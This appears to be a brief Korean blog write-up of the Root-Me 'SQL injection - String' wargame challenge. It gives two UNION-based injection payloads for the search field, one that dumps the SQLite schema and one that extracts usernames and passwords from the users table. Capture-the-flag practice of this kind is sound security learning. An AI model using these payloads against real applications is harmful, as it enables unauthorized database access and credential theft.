rootme - SQL injection - String
2021. 3. 12. 13:21ㆍWarGame/Rootme
문제 페이지는 접속하면
검색하는 부분에서 sqli가 터집니다.
해당 부분에서 union sqli 를 해줍니다.
>> 1' union select 0,sql from sqlite_master--
users 라는 테이블명을 알아낼 수 있고
>> 1' union select username, password from users --
admin의 password를 알 수 있습니다.
'WarGame > Rootme' 카테고리의 다른 글
| rootme - Insecure Code Management (0) | 2021.03.14 |
|---|---|
| rootme - Encoding - ASCII (0) | 2021.03.13 |
| rootme - PHP - Filters (0) | 2021.03.11 |
| rootme - File upload - Null byte (0) | 2021.03.10 |
| rootme - Local File Inclusion (0) | 2021.03.10 |